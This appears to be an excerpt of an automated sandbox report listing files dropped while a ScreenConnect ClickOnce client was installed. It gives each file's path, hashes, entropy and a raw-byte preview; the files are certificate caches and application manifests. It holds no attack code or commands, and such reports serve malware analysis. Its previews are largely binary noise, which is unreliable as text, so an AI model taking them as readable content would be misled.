                                                                                                                                                                                                                                                      SHA-512:B6667CC8D0742596B9DF6D2BE100B6639E744D4CA4EB5E67C0E607E371133522E0F6B80B8D7D2A81FEF743C75E4E262690A8759B7BE6C1108412C0B55770CCB8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4770
                                                                                                                                                                                                                                                      Entropy (8bit):7.946747821604857
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:9/nBu64pydcvOHRUfu0xK1bQYMRSRNoYmxYvk56sHMZhh4m:9/nBuP2cGxUfu6K1bpWJ6vfh4m
                                                                                                                                                                                                                                                      MD5:1BFE591A4FE3D91B03CDF26EAACD8F89
                                                                                                                                                                                                                                                      SHA1:719C37C320F518AC168C86723724891950911CEA
                                                                                                                                                                                                                                                      SHA-256:9CF94355051BF0F4A45724CA20D1CC02F76371B963AB7D1E38BD8997737B13D8
                                                                                                                                                                                                                                                      SHA-512:02F88DA4B610678C31664609BCFA9D61DB8D0B0617649981AF948F670F41A6207B4EC19FECCE7385A24E0C609CBBF3F2B79A8ACAF09A03C2C432CC4DCE75E9DB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MSCF............,...................O.................2Wqh .disallowedcert.stl....^K...CK.wTS...:.w.K'.C0T.....Bh.{....C.).*.....Y@...(..).R."E..D^6........u....|f~3...o.3. ..SPK.k.o#...."{-.U..P........:..aPr.@.d......Dy.h.....)..:...!./\A.....A<I_<$...q.h..........'.....7....H...@`T..K.S.%...Y4..R.....`.....-....D...(..b..-c."...G.=.dx..S+..2.a.E....d.L...77J...c.[..@..iT&..^78..g....NW6.Ek..FY.F........cNt.O.*..R....*......D...... k........J.y...z.d...;.9_t...].@....yw..}.x....d.t..`f\K..;|.*h.X...4/.;.xT......q>.0...<...3...X..L$.&.,b.....\V....\......G..O..@..H3.....t..J..).x.?.{[..G>.7...<...^Q..z..Gw9P..d....i].n%K}.*z..2.Py...A..s...z..@...4..........4.....*Y.d..._Z.5.s..fl.C..#.K{9^.E...k..z.Ma..G.(.....5g. ...}.t.#4....$;.,....S@fs....k......u .^2.#_...I........;.......w..P...UCY...$;.S._|.x..dK...[i..q..^.l..A.?.....'N.. .L.l......m.*.+f#]............A.;.....Z..rIt....RW....Kr1e=8.=.z:Oi.z.d..r..C_......o...]j.N;.s....3@3.dgrv.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):71954
                                                                                                                                                                                                                                                      Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Certificate, Version=3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1716
                                                                                                                                                                                                                                                      Entropy (8bit):7.596259519827648
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
                                                                                                                                                                                                                                                      MD5:D91299E84355CD8D5A86795A0118B6E9
                                                                                                                                                                                                                                                      SHA1:7B0F360B775F76C94A12CA48445AA2D2A875701C
                                                                                                                                                                                                                                                      SHA-256:46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
                                                                                                                                                                                                                                                      SHA-512:6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:0...0............@.`.L.^.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0...*.H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.|f..x8E0.O.cOL....SA|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):727
                                                                                                                                                                                                                                                      Entropy (8bit):7.563840806637443
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:5onfZPc5RlRtBfQRKsS3GO1OfBJWPggSMcJD0Khky41hrQOSFxvF0nBwUU2wZ:5iFcdZ6KP3YHHMcJyyO9QOSunaT2wZ
                                                                                                                                                                                                                                                      MD5:23D2A40D03B92FF977A4F7F3F5B7B3D6
                                                                                                                                                                                                                                                      SHA1:DFAF45BE65A508FED92543473C235FB9E56EC900
                                                                                                                                                                                                                                                      SHA-256:42931FA0CF548D85BAB78A132B91B75AF2E8C94891568C976BE1C9B48D3ECAB1
                                                                                                                                                                                                                                                      SHA-512:2383D3513513D6D929FD1B7D780D152B3D8240EC013DEF216C6BAB6127B3C4BC523770A1BD388A84100C0672E68B6C46E62DDAAD78BB641E084C6F43690C1966
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241023184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241023184215Z....20241030184215Z0...*.H.............$...Q...}oW..X.].2......2d....mOE.x.. sB1p..4..z,A.D7...[...E..JPH.M.&....).q.........V.h.c.............:......T{.....q.`..Z.u.(..b.K..=.ev..F.....inf.T.6$.R.L3E.....Aq.......4'<....S.F|[}}#T.....N.N6.6#Wmu.j..m.d....G...S.{).Pk.....e..{iFO..Q>.&..lG`...,.b.?..Kh4b..q...@'.H.:.{...L.X.ZT...2.gf.!?:...G...*.Z}.$p.f.....}.N.. ...2T...M....8..3..NJj...Z.h.............[..Z.q.<.G(F..j.....'..&.....:..(.Y..s...5A..7....!....4.N..,..O..oU2..5..g...CX.....SZ..A..@=u.0B.gJ......L;..(.9

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Certificate, Version=3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1428
                                                                                                                                                                                                                                                      Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                      MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                      SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                      SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                      SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):338
                                                                                                                                                                                                                                                      Entropy (8bit):3.462038329656643
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKp3mTsK8qJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:Bm/OkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                      MD5:6179531C1FC3974FF6774A23F9885A5A
                                                                                                                                                                                                                                                      SHA1:5B90156B130E3702CC309E43F782AC077FB28C56
                                                                                                                                                                                                                                                      SHA-256:72992C16E1857777F620FD13725A70B5A336DC11A67EE1D14032F9678C08BF90
                                                                                                                                                                                                                                                      SHA-512:488BF8D10E6D2CE1F7CAE91B8AE9446E605CADE44A08ED97CCCF4172646EDE2F8BA279110DF9D7003A78ABAEBE33BA2B1A0A584159FF20B6FD717317092A21FA
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... .............(..(...............................................B..@.'.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):328
                                                                                                                                                                                                                                                      Entropy (8bit):3.1440865988908953
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKQPL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:YPiDnLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                                      MD5:5DF746F38F3A9F41ED16A8AC1B3C1543
                                                                                                                                                                                                                                                      SHA1:E353A4CB585205E877018AF80746E54063CB05CC
                                                                                                                                                                                                                                                      SHA-256:B3C561B622B6F83BAAA7C07A5D76AD5E2EDF1BA8F8B4C728BFFAD1DF1C3B4468
                                                                                                                                                                                                                                                      SHA-512:AB291942BE23F508AB609797E2CBEEB9F5A560B61F51149168A26C599E13E810EA2D8BCF8E15FDA53A448A0B2A0DAC420B813CA86AD0EB77F5C1AD4415F1A154
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ............_'..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):308
                                                                                                                                                                                                                                                      Entropy (8bit):3.2220888806886414
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKHfzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:/qtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                      MD5:C8695AD868C5D679FEFA80294D6E8754
                                                                                                                                                                                                                                                      SHA1:5C86FED4E4E70015DD9141374E6A26C19E2C2358
                                                                                                                                                                                                                                                      SHA-256:CAC8A754E503319D65A1EDAC1146CA6CFC6C2AFE37C1C86A1D39B680022B95BF
                                                                                                                                                                                                                                                      SHA-512:21430A739FBE1E4DFC1E58BAEB9873BDCF625E0F32D5850F4899E0318291E1998F4988A953C7E85B6EB66941BAF01A1EF0576972FE6D5C292CBCE119AEC4E2DE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ..........j[w'..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):412
                                                                                                                                                                                                                                                      Entropy (8bit):3.988822088625967
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKq9sbetlIls0fOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:4sRmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                      MD5:5D95EE8A208CDCF95FAA883B2B58B6BC
                                                                                                                                                                                                                                                      SHA1:7C10D362DB4B483D9006B68C56CB22C07773C88C
                                                                                                                                                                                                                                                      SHA-256:22D03BCE0326E5D6F71D54C7EA35A5559CA27F2BC4150053828DABD686D75979
                                                                                                                                                                                                                                                      SHA-512:8C19856F728AE2B544607D282F525598FAE13B2790472D98B20EFE311F5FED62D78B4FE483E1D637B16EA7FC1741ABCB89A709F3586BEC3240D7A3A4EA834E3F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ....(... .._l'..(................].G{%....}p.*....................}p.*.. ........\...&.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):254
                                                                                                                                                                                                                                                      Entropy (8bit):3.060772882719261
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:kKBhLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:JhLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                      MD5:7EE0D20871EEBC26C6F87D13613FCD63
                                                                                                                                                                                                                                                      SHA1:16ABB2199B0994B06EB54EEC38884D5F19EC9039
                                                                                                                                                                                                                                                      SHA-256:8A7C4BE405C901F5D5EDE7F860CB105421ACBEFA2C91F4BA376A78C2C6F71592
                                                                                                                                                                                                                                                      SHA-512:8B75E7702EE14368B47C0324D6C4D5536148E0BD2C1EB911E5B5CF76A17F0E85E1390508E698E3424923ED720F880F74347D31098E314B9DDB59C9C08DD4120B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:p...... ....l....H..N'..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):25496
                                                                                                                                                                                                                                                      Entropy (8bit):5.584548820720437
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:Crq5BjGch63X91yYFX9R/QPIBM7YfGOxUdrVuQ9575Jeud4r:CWVh63X9PX9R/QPI+0fGOxQDee0
                                                                                                                                                                                                                                                      MD5:2E2FF68AA93F1E43A47F51BB04C45769
                                                                                                                                                                                                                                                      SHA1:BCF2F5E86E4C458A52A67C27B06B89EF50953CCF
                                                                                                                                                                                                                                                      SHA-256:7C42D915394ABF651E4D960BCC8AA1150246D87962FA4950AB8CB8DAB99BAF44
                                                                                                                                                                                                                                                      SHA-512:ED4E3FCF566206D7EF779CFB2922DD542FFF284F0DDA5793974624CEAD934CD9A5D4367B3593C9B9ABD8AE44A2A87475368954C5849E72377A5105BD039F7C06
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:PcmH........RG1..5f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........U............S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R......3LD.SV...[s.T..<Y...O.&r..Vz\...........`.......=...P...S...W...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17858
                                                                                                                                                                                                                                                      Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                      MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                      SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                      SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                      SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.cdf-ms

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3452
                                                                                                                                                                                                                                                      Entropy (8bit):4.228306711669954
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:CIEAeF7lMDWW+LgJOe6S+9owQX7gq7mLoKp3Ga4FhkG1WllcQF/0hIYX:CsWWOeV+WwQXzmLoK8dF2G10cQF8hIYX
                                                                                                                                                                                                                                                      MD5:395ADCCFE5F13918F08B5AF960A51BF7
                                                                                                                                                                                                                                                      SHA1:B15D2B66D112F30A13328FB5005D36F93A84CC25
                                                                                                                                                                                                                                                      SHA-256:BC49C4B9BC7EAA2641F1A0EA823CBFC2AFA47FA53DB3D2BD0E5799120F601574
                                                                                                                                                                                                                                                      SHA-512:1132814C470B11A194A05D1B39D1A10B73143BBC22FA648B4FA501CF3ED8A6DEC3E9B96AAB9EE825C9924964C32C2F40A7B10513A7C49FD6E54798EA85D158DC
                                                                                                                                                                                                                                                      Malicious:false
